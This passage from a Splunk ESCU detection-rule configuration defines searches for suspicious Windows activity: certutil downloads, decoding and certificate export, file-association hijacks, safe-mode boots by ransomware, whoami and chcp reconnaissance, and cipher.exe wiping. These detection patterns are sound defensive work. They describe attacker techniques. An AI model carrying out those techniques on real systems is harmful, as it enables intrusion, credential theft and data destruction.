endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Limited false positives in most environments, however tune as needed based on parent-child relationship or network connection. action.escu.creation_date = 2022-02-03 action.escu.modification_date = 2022-02-03 action.escu.confidence = high action.escu.full_search_name = ESCU - CertUtil Download With VerifyCtl and Split Arguments - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Ingress Tool Transfer", "DarkSide Ransomware", "Living Off The Land"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ attempting to download a file. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 90}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 90}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 90}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 90}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - CertUtil Download With VerifyCtl and Split Arguments - Rule action.correlationsearch.annotations = {"analytic_story": ["Ingress Tool Transfer", "DarkSide Ransomware", "Living Off The Land"], "cis20": ["CIS 10"], "confidence": 100, "impact": 90, "kill_chain_phases": ["Command and Control"], "mitre_attack": ["T1105"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = Certutil.exe may download a file from a remote destination using `-VerifyCtl`. This behavior does require a URL to be passed on the command-line. In addition, `-f` (force) and `-split` (Split embedded ASN.1 elements, and save to files) will be used. It is not entirely common for `certutil.exe` to contact public IP space. \ During triage, capture any files on disk and review. Review the reputation of the remote IP or domain in question. Using `-VerifyCtl`, the file will either be written to the current working directory or `%APPDATA%\..\LocalLow\Microsoft\CryptnetUrlCache\Content\`. action.notable.param.rule_title = CertUtil Download With VerifyCtl and Split Arguments action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_certutil` (Processes.process=*verifyctl* Processes.process=*split*) OR Processes.process=*verifyctl* by Processes.dest Processes.user Processes.original_file_name Processes.parent_process Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `certutil_download_with_verifyctl_and_split_arguments_filter` [ESCU - Certutil exe certificate extraction - Rule] action.escu = 0 action.escu.enabled = 1 description = This search looks for arguments to certutil.exe indicating the manipulation or extraction of Certificate. This certificate can then be used to sign new authentication tokens specially inside Federated environments such as Windows ADFS. action.escu.mappings = {"cis20": ["CIS 10"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This search looks for arguments to certutil.exe indicating the manipulation or extraction of Certificate. This certificate can then be used to sign new authentication tokens specially inside Federated environments such as Windows ADFS. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Unless there are specific use cases, manipulating or exporting certificates using certutil is uncommon. Extraction of certificate has been observed during attacks such as Golden SAML and other campaigns targeting Federated services. action.escu.creation_date = 2022-07-15 action.escu.modification_date = 2022-07-15 action.escu.confidence = high action.escu.full_search_name = ESCU - Certutil exe certificate extraction - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Windows Persistence Techniques", "Cloud Federated Credential Abuse", "Living Off The Land", "Windows Certificate Services"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ attempting export a certificate. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 63}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 63}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 63}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 63}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Certutil exe certificate extraction - Rule action.correlationsearch.annotations = {"analytic_story": ["Windows Persistence Techniques", "Cloud Federated Credential Abuse", "Living Off The Land", "Windows Certificate Services"], "cis20": ["CIS 10"], "confidence": 70, "impact": 90, "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search looks for arguments to certutil.exe indicating the manipulation or extraction of Certificate. This certificate can then be used to sign new authentication tokens specially inside Federated environments such as Windows ADFS. action.notable.param.rule_title = Certutil exe certificate extraction action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=certutil.exe Processes.process = "*-exportPFX*" by Processes.dest Processes.user Processes.parent_process Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `certutil_exe_certificate_extraction_filter` [ESCU - CertUtil With Decode Argument - Rule] action.escu = 0 action.escu.enabled = 1 description = CertUtil.exe may be used to `encode` and `decode` a file, including PE and script code. Encoding will convert a file to base64 with `-----BEGIN CERTIFICATE-----` and `-----END CERTIFICATE-----` tags. Malicious usage will include decoding a encoded file that was downloaded. Once decoded, it will be loaded by a parallel process. Note that there are two additional command switches that may be used - `encodehex` and `decodehex`. Similarly, the file will be encoded in HEX and later decoded for further execution. During triage, identify the source of the file being decoded. Review its contents or execution behavior for further analysis. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1140"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = CertUtil.exe may be used to `encode` and `decode` a file, including PE and script code. Encoding will convert a file to base64 with `-----BEGIN CERTIFICATE-----` and `-----END CERTIFICATE-----` tags. Malicious usage will include decoding a encoded file that was downloaded. Once decoded, it will be loaded by a parallel process. Note that there are two additional command switches that may be used - `encodehex` and `decodehex`. Similarly, the file will be encoded in HEX and later decoded for further execution. During triage, identify the source of the file being decoded. Review its contents or execution behavior for further analysis. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Typically seen used to `encode` files, but it is possible to see legitimate use of `decode`. Filter based on parent-child relationship, file paths, endpoint or user. action.escu.creation_date = 2021-03-23 action.escu.modification_date = 2021-03-23 action.escu.confidence = high action.escu.full_search_name = ESCU - CertUtil With Decode Argument - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Deobfuscate-Decode Files or Information", "Living Off The Land", "Forest Blizzard", "APT29 Diplomatic Deceptions with WINELOADER"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ attempting to decode a file. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 40}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 40}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 40}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 40}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - CertUtil With Decode Argument - Rule action.correlationsearch.annotations = {"analytic_story": ["Deobfuscate-Decode Files or Information", "Living Off The Land", "Forest Blizzard", "APT29 Diplomatic Deceptions with WINELOADER"], "cis20": ["CIS 10"], "confidence": 80, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1140"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = CertUtil.exe may be used to `encode` and `decode` a file, including PE and script code. Encoding will convert a file to base64 with `-----BEGIN CERTIFICATE-----` and `-----END CERTIFICATE-----` tags. Malicious usage will include decoding a encoded file that was downloaded. Once decoded, it will be loaded by a parallel process. Note that there are two additional command switches that may be used - `encodehex` and `decodehex`. Similarly, the file will be encoded in HEX and later decoded for further execution. During triage, identify the source of the file being decoded. Review its contents or execution behavior for further analysis. action.notable.param.rule_title = CertUtil With Decode Argument action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_certutil` Processes.process=*decode* by Processes.dest Processes.user Processes.parent_process Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `certutil_with_decode_argument_filter` [ESCU - Change Default File Association - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic is developed to detect suspicious registry modification to change the default file association of windows to malicious payload. This technique was seen in some APT where it modify the default process to run file association, like .txt to notepad.exe. Instead notepad.exe it will point to a Script or other payload that will load malicious commands to the compromised host. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1546.001", "T1546"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic is developed to detect suspicious registry modification to change the default file association of windows to malicious payload. This technique was seen in some APT where it modify the default process to run file association, like .txt to notepad.exe. Instead notepad.exe it will point to a Script or other payload that will load malicious commands to the compromised host. action.escu.how_to_implement = To successfully implement this search, you must be ingesting data that records registry activity from your hosts to populate the endpoint data model in the registry node. This is typically populated via endpoint detection-and-response product, such as Carbon Black or endpoint data sources, such as Sysmon. The data used for this search is typically generated via logs that report reads and writes to the registry. action.escu.known_false_positives = unknown action.escu.creation_date = 2023-04-14 action.escu.modification_date = 2023-04-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Change Default File Association - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Hermetic Wiper", "Windows Registry Abuse", "Prestige Ransomware", "Windows Privilege Escalation", "Windows Persistence Techniques", "Data Destruction"] action.risk = 1 action.risk.param._risk_message = modified/added/deleted registry entry $Registry.registry_path$ in $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 80}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 80}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Change Default File Association - Rule action.correlationsearch.annotations = {"analytic_story": ["Hermetic Wiper", "Windows Registry Abuse", "Prestige Ransomware", "Windows Privilege Escalation", "Windows Persistence Techniques", "Data Destruction"], "cis20": ["CIS 10"], "confidence": 100, "impact": 80, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1546.001", "T1546"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic is developed to detect suspicious registry modification to change the default file association of windows to malicious payload. This technique was seen in some APT where it modify the default process to run file association, like .txt to notepad.exe. Instead notepad.exe it will point to a Script or other payload that will load malicious commands to the compromised host. action.notable.param.rule_title = Change Default File Association action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Registry where Registry.registry_path ="*\\shell\\open\\command\\*" Registry.registry_path = "*HKCR\\*" by Registry.dest Registry.user Registry.registry_path Registry.registry_key_name Registry.registry_value_name | `security_content_ctime(lastTime)` | `security_content_ctime(firstTime)` | `drop_dm_object_name(Registry)` | `change_default_file_association_filter` [ESCU - Change To Safe Mode With Network Config - Rule] action.escu = 0 action.escu.enabled = 1 description = This search is to detect a suspicious bcdedit commandline to configure the host to boot in safe mode with network config. This technique was seen in blackMatter ransomware where it force the compromised host to boot in safe mode to continue its encryption and bring back to normal boot using bcdedit deletevalue command. This TTP can be a good alert for host that booted from safe mode forcefully since it need to modify the boot configuration to bring it back to normal. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1490"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This search is to detect a suspicious bcdedit commandline to configure the host to boot in safe mode with network config. This technique was seen in blackMatter ransomware where it force the compromised host to boot in safe mode to continue its encryption and bring back to normal boot using bcdedit deletevalue command. This TTP can be a good alert for host that booted from safe mode forcefully since it need to modify the boot configuration to bring it back to normal. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = unknown action.escu.creation_date = 2021-09-06 action.escu.modification_date = 2021-09-06 action.escu.confidence = high action.escu.full_search_name = ESCU - Change To Safe Mode With Network Config - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["BlackMatter Ransomware"] action.risk = 1 action.risk.param._risk_message = bcdedit process with commandline $process$ to force safemode boot the $dest$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Change To Safe Mode With Network Config - Rule action.correlationsearch.annotations = {"analytic_story": ["BlackMatter Ransomware"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1490"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search is to detect a suspicious bcdedit commandline to configure the host to boot in safe mode with network config. This technique was seen in blackMatter ransomware where it force the compromised host to boot in safe mode to continue its encryption and bring back to normal boot using bcdedit deletevalue command. This TTP can be a good alert for host that booted from safe mode forcefully since it need to modify the boot configuration to bring it back to normal. action.notable.param.rule_title = Change To Safe Mode With Network Config action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name = bcdedit.exe Processes.process="*/set*" Processes.process="*{current}*" Processes.process="*safeboot*" Processes.process="*network*" by Processes.process_name Processes.process Processes.parent_process_name Processes.dest Processes.user |`drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `change_to_safe_mode_with_network_config_filter` [ESCU - CHCP Command Execution - Rule] action.escu = 0 action.escu.enabled = 1 description = This search is to detect execution of chcp.exe application. this utility is used to change the active code page of the console. This technique was seen in icedid malware to know the locale region/language/country of the compromise host. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This search is to detect execution of chcp.exe application. this utility is used to change the active code page of the console. This technique was seen in icedid malware to know the locale region/language/country of the compromise host. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = other tools or script may used this to change code page to UTF-* or others action.escu.creation_date = 2021-07-27 action.escu.modification_date = 2021-07-27 action.escu.confidence = high action.escu.full_search_name = ESCU - CHCP Command Execution - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["IcedID", "Azorult", "Forest Blizzard"] action.risk = 1 action.risk.param._risk_message = parent process $parent_process_name$ spawning chcp process $process_name$ with parent command line $parent_process$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 9}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 9}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - CHCP Command Execution - Rule action.correlationsearch.annotations = {"analytic_story": ["IcedID", "Azorult", "Forest Blizzard"], "cis20": ["CIS 10"], "confidence": 30, "impact": 30, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search is to detect execution of chcp.exe application. this utility is used to change the active code page of the console. This technique was seen in icedid malware to know the locale region/language/country of the compromise host. action.notable.param.rule_title = CHCP Command Execution action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=chcp.com Processes.parent_process_name = cmd.exe (Processes.parent_process=*/c* OR Processes.parent_process=*/k*) by Processes.process_name Processes.process Processes.parent_process_name Processes.parent_process Processes.process_id Processes.parent_process_id Processes.dest Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `chcp_command_execution_filter` [ESCU - Check Elevated CMD using whoami - Rule] action.escu = 0 action.escu.enabled = 1 description = This search is to detect a suspicious whoami execution to check if the cmd or shell instance process is with elevated privileges. This technique was seen in FIN7 js implant where it execute this as part of its data collection to the infected machine to check if the running shell cmd process is elevated or not. This TTP is really a good alert for known attacker that recon on the targetted host. This command is not so commonly executed by a normal user or even an admin to check if a process is elevated. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1033"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This search is to detect a suspicious whoami execution to check if the cmd or shell instance process is with elevated privileges. This technique was seen in FIN7 js implant where it execute this as part of its data collection to the infected machine to check if the running shell cmd process is elevated or not. This TTP is really a good alert for known attacker that recon on the targetted host. This command is not so commonly executed by a normal user or even an admin to check if a process is elevated. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = unknown action.escu.creation_date = 2021-09-15 action.escu.modification_date = 2021-09-15 action.escu.confidence = high action.escu.full_search_name = ESCU - Check Elevated CMD using whoami - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["FIN7"] action.risk = 1 action.risk.param._risk_message = Process name $process_name$ with commandline $process$ in $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 56}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 56}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Check Elevated CMD using whoami - Rule action.correlationsearch.annotations = {"analytic_story": ["FIN7"], "cis20": ["CIS 10"], "confidence": 80, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1033"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search is to detect a suspicious whoami execution to check if the cmd or shell instance process is with elevated privileges. This technique was seen in FIN7 js implant where it execute this as part of its data collection to the infected machine to check if the running shell cmd process is elevated or not. This TTP is really a good alert for known attacker that recon on the targetted host. This command is not so commonly executed by a normal user or even an admin to check if a process is elevated. action.notable.param.rule_title = Check Elevated CMD using whoami action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process = "*whoami*" Processes.process = "*/group*" Processes.process = "* find *" Processes.process = "*12288*" by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `check_elevated_cmd_using_whoami_filter` [ESCU - Child Processes of Spoolsv exe - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This search looks for child processes of spoolsv.exe. This activity is associated with a POC privilege-escalation exploit associated with CVE-2018-8440. Spoolsv.exe is the process associated with the Print Spooler service in Windows and typically runs as SYSTEM. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1068"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This search looks for child processes of spoolsv.exe. This activity is associated with a POC privilege-escalation exploit associated with CVE-2018-8440. Spoolsv.exe is the process associated with the Print Spooler service in Windows and typically runs as SYSTEM. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Some legitimate printer-related processes may show up as children of spoolsv.exe. You should confirm that any activity as legitimate and may be added as exclusions in the search. action.escu.creation_date = 2023-04-14 action.escu.modification_date = 2023-04-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Child Processes of Spoolsv exe - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Data Destruction", "Hermetic Wiper", "Windows Privilege Escalation"] action.risk = 1 action.risk.param._risk_message = tbd action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - Child Processes of Spoolsv exe - Rule action.correlationsearch.annotations = {"analytic_story": ["Data Destruction", "Hermetic Wiper", "Windows Privilege Escalation"], "cis20": ["CIS 10"], "confidence": 50, "cve": ["CVE-2018-8440"], "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1068"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search looks for child processes of spoolsv.exe. This activity is associated with a POC privilege-escalation exploit associated with CVE-2018-8440. Spoolsv.exe is the process associated with the Print Spooler service in Windows and typically runs as SYSTEM. action.notable.param.rule_title = Child Processes of Spoolsv exe action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count values(Processes.process_name) as process_name values(Processes.process) as process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name=spoolsv.exe AND Processes.process_name!=regsvr32.exe by Processes.dest Processes.parent_process Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `child_processes_of_spoolsv_exe_filter` [ESCU - Clear Unallocated Sector Using Cipher App - Rule] action.escu = 0 action.escu.enabled = 1 description = this search is to detect execution of `cipher.exe` to clear the unallocated sectors of a specific disk. This technique was seen in some ransomware to make it impossible to forensically recover deleted files. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1070.004", "T1070"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = this search is to detect execution of `cipher.exe` to clear the unallocated sectors of a specific disk. This technique was seen in some ransomware to make it impossible to forensically recover deleted files. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = administrator may execute this app to manage disk action.escu.creation_date = 2021-06-10 action.escu.modification_date = 2021-06-10 action.escu.confidence = high action.escu.full_search_name = ESCU - Clear Unallocated Sector Using Cipher App - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Ransomware"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ attempting to clear the unallocated sectors of a specific disk. 